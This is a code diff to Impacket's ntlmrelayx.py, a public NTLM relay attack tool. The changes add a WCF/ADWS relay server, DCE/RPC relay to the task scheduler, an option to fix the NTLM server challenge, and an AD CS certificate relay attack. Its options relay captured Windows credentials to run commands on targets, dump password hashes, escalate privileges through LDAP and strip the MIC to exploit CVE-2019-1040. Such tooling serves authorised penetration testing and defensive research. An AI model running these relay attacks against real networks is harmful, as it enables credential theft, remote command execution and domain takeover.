@@ -1,36 +1,38 @@
-#!/usr/local/bin/python3.9
-#!/usr/local/bin/python3.9
-# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#!/usr/local/bin/python3.13
+#!/usr/local/bin/python3.13
+# Impacket - Collection of Python classes for working with network protocols.
 #
-# This software is provided under under a slightly modified version
+# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
 # for more information.
 #
-# Generic NTLM Relay Module
+# Description:
+#   Generic NTLM Relay Module
+#
+#   This module performs the SMB Relay attacks originally discovered
+#   by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc).
+#   It receives a list of targets and for every connection received it
+#   will choose the next target and try to relay the credentials. Also, if
+#   specified, it will first to try authenticate against the client connecting
+#   to us.
+#
+#   It is implemented by invoking a SMB and HTTP Server, hooking to a few
+#   functions and then using the specific protocol clients (e.g. SMB, LDAP).
+#   It is supposed to be working on any LM Compatibility level. The only way
+#   to stop this attack is to enforce on the server SPN checks and or signing.
+#
+#   If the authentication against the targets succeeds, the client authentication
+#   succeeds as well and a valid connection is set against the local smbserver.
+#   It's up to the user to set up the local smbserver functionality. One option
+#   is to set up shares with whatever files you want to so the victim thinks it's
+#   connected to a valid SMB server. All that is done through the smb.conf file or
+#   programmatically.
 #
 # Authors:
-#  Alberto Solino (@agsolino)
-#  Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
-#
-# Description:
-#             This module performs the SMB Relay attacks originally discovered
-# by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc).
-# It receives a list of targets and for every connection received it
-# will choose the next target and try to relay the credentials. Also, if
-# specified, it will first to try authenticate against the client connecting
-# to us.
-#
-# It is implemented by invoking a SMB and HTTP Server, hooking to a few
-# functions and then using the specific protocol clients (e.g. SMB, LDAP).
-# It is supposed to be working on any LM Compatibility level. The only way
-# to stop this attack is to enforce on the server SPN checks and or signing.
-#
-# If the authentication against the targets succeeds, the client authentication
-# succeeds as well and a valid connection is set against the local smbserver.
-# It's up to the user to set up the local smbserver functionality. One option
-# is to set up shares with whatever files you want to so the victim thinks it's
-# connected to a valid SMB server. All that is done through the smb.conf file or
-# programmatically.
+#   Alberto Solino (@agsolino)
+#   Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
 #
 
 import argparse
@@ -47,7 +49,7 @@ from threading import Thread
 
 from impacket import version
 from impacket.examples import logger
-from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer
+from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer, WCFRelayServer
 from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
 from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher
 from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS
@@ -152,21 +154,27 @@ def start_servers(options, threads):
         c.setLootdir(options.lootdir)
         c.setOutputFile(options.output_file)
         c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.sid)
+        c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port)
         c.setMSSQLOptions(options.query)
         c.setInteractive(options.interactive)
         c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
         c.setIPv6(options.ipv6)
         c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
         c.setSMB2Support(options.smb2support)
+        c.setSMBChallenge(options.ntlmchallenge)
         c.setInterfaceIp(options.interface_ip)
         c.setExploitOptions(options.remove_mic, options.remove_target)
         c.setWebDAVOptions(options.serve_image)
+        c.setIsADCSAttack(options.adcs)
+        c.setADCSOptions(options.template)
 
         if server is HTTPRelayServer:
             c.setListeningPort(options.http_port)
             c.setDomainAccount(options.machine_account, options.machine_hashes, options.domain)
         elif server is SMBRelayServer:
             c.setListeningPort(options.smb_port)
+        elif server is WCFRelayServer:
+            c.setListeningPort(options.wcf_port)
 
         #If the redirect option is set, configure the HTTP server to redirect targets to SMB
         if server is HTTPRelayServer and options.r is not None:
@@ -185,7 +193,7 @@ def start_servers(options, threads):
 def stop_servers(threads):
     todelete = []
     for thread in threads:
-        if isinstance(thread, RELAY_SERVERS):
+        if isinstance(thread, tuple(RELAY_SERVERS)):
             thread.server.shutdown()
             todelete.append(thread)
     # Now remove threads from the set
@@ -222,12 +230,14 @@ if __name__ == '__main__':
     parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to '
                   'bind SMB and HTTP servers',default='')
 
-    serversoptions = parser.add_mutually_exclusive_group()
+    serversoptions = parser.add_argument_group()
     serversoptions.add_argument('--no-smb-server', action='store_true', help='Disables the SMB server')
     serversoptions.add_argument('--no-http-server', action='store_true', help='Disables the HTTP server')
+    serversoptions.add_argument('--no-wcf-server', action='store_true', help='Disables the WCF server')
 
     parser.add_argument('--smb-port', type=int, help='Port to listen on smb server', default=445)
     parser.add_argument('--http-port', type=int, help='Port to listen on http server', default=80)
+    parser.add_argument('--wcf-port', type=int, help='Port to listen on wcf server', default=9389)  # ADWS
 
     parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection')
     parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
@@ -240,7 +250,10 @@ if __name__ == '__main__':
                                                        'map the result with '
                                                        'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute ntlmrelayx.py '
                                                        'again with -codec and the corresponding codec ' % sys.getdefaultencoding())
-    parser.add_argument('-smb2support', action="store_true", default=False, help='SMB2 Support (experimental!)')
+    parser.add_argument('-smb2support', action="store_true", default=False, help='SMB2 Support')
+    parser.add_argument('-ntlmchallenge', action="store", default=None, help='Specifies the NTLM server challenge used by the '
+                                                                             'SMB Server (16 hex bytes long. eg: 1122334455667788)')
+
     parser.add_argument('-socks', action='store_true', default=False,
                         help='Launch a SOCKS proxy for the connection relayed')
     parser.add_argument('-wh','--wpad-host', action='store',help='Enable serving a WPAD file for Proxy Authentication attack, '
@@ -251,16 +264,26 @@ if __name__ == '__main__':
     parser.add_argument('--remove-mic', action='store_true',help='Remove MIC (exploit CVE-2019-1040)')
     parser.add_argument('--serve-image', action='store',help='local path of the image that will we returned to clients')
 
+    parser.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
+                        'target system (for SMB and RPC). If not specified for SMB, hashes will be dumped (secretsdump.py must be'
+                        ' in the same directory). For RPC no output will be provided.')
+
     #SMB arguments
     smboptions = parser.add_argument_group("SMB client options")
 
     smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. '
                                      'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
-    smboptions.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
-                        'target system. If not specified, hashes will be dumped (secretsdump.py must be in the same '
-                                                          'directory).')
     smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
 
+    #RPC arguments
+    rpcoptions = parser.add_argument_group("RPC client options")
+    rpcoptions.add_argument('-rpc-mode', choices=["TSCH"], default="TSCH", help='Protocol to attack, only TSCH supported')
+    rpcoptions.add_argument('-rpc-use-smb', action='store_true', required=False, help='Relay DCE/RPC to SMB pipes')
+    rpcoptions.add_argument('-auth-smb', action='store', required=False, default='', metavar='[domain/]username[:password]',
+        help='Use this credential to authenticate to SMB (low-privilege account)')
+    rpcoptions.add_argument('-hashes-smb', action='store', required=False, metavar="LMHASH:NTHASH")
+    rpcoptions.add_argument('-rpc-smb-port', type=int, choices=[139, 445], default=445, help='Destination port to connect to SMB')
+
     #MSSQL arguments
     mssqloptions = parser.add_argument_group("MSSQL client options")
     mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute'
@@ -300,12 +323,21 @@ if __name__ == '__main__':
     imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump '
         '(0 = unlimited, default: no limit)')
 
+    # AD CS options
+    adcsoptions = parser.add_argument_group("AD CS attack options")
+    adcsoptions.add_argument('--adcs', action='store_true', required=False, help='Enable AD CS relay attack')
+    adcsoptions.add_argument('--template', action='store', metavar="TEMPLATE", required=False, default="Machine", help='AD CS template. If you are attacking Domain Controller or other windows server machine, default value should be suitable.')
+
     try:
        options = parser.parse_args()
     except Exception as e:
        logging.error(str(e))
        sys.exit(1)
 
+    if options.rpc_use_smb and not options.auth_smb:
+       logging.error("Set -auth-smb to relay DCE/RPC to SMB pipes")
+       sys.exit(1)
+
     # Init the example's logger theme
     logger.init(options.ts)
 
@@ -352,6 +384,8 @@ if __name__ == '__main__':
         if options.r is not None:
             logging.info("Running HTTP server in redirect mode")
 
+    if not options.no_wcf_server:
+        RELAY_SERVERS.append(WCFRelayServer)
 
     if targetSystem is not None and options.w:
         watchthread = TargetsFileWatcher(targetSystem)
